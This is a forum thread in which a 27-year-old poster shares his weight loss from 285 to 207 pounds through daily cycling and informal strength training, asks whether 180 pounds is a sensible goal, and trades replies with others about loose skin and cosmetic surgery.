Hi fit. I was 285 in Janurary, 265 after halfass dieting on June 1st. Currently 207 (scale might be reading a bit low, but the difference should be correct). I'll post a followup graph of the loss.

I've been biking 15 miles a day (around 1hr) along with a non-regimented strength training rotation (random pullups, pushups, crunches, dips, squats).

There is still quite obviously a coating of flab all over, with significant deposits on the moobs, lovehandles and gut... How much more weight do I need to lose? I was thinking a 180 target would be pretty good - Haven't been that low since 6th grade (unless you count the 1-2 days after basic training... I do have more muscle mass than after BMT though).

In before fatass, you should have seen me before though (was too depressed to take before pictures).

Dunno how old OP is, but he's definitely no kid anymore. The skin is definitely losing some elasticity, and if he loses enough, quickly enough, he may have to think about cosmetic surgery down the line if he wants to show off the results.

So you spend all that time and energy and money losing weight, and you still need to get surgery to fix the skin?

Why not just walk your fat ass into the surgery clinic in the first place, do a lipo and get the skin done while you're there?

Time, energy and money? I work out maybe 1.5hrs a day, I eat 50 bucks worth of food a week.

I'm 27, I know that I'll probably never have a tight body without surgery, and I don't plan to get surgery.

I just want to be in shape, and look decent with clothes on.

Like I said, I'd like to get to 180 or so (real weight not my scale weight) so somewhere between 30 and 40lbs to go.

For right now I can tell I've lost weight, but I feel pretty much just as fat as I was at 250. I'll just keep doing what I'm doing and hope one day the moob fairy visits and takes them.
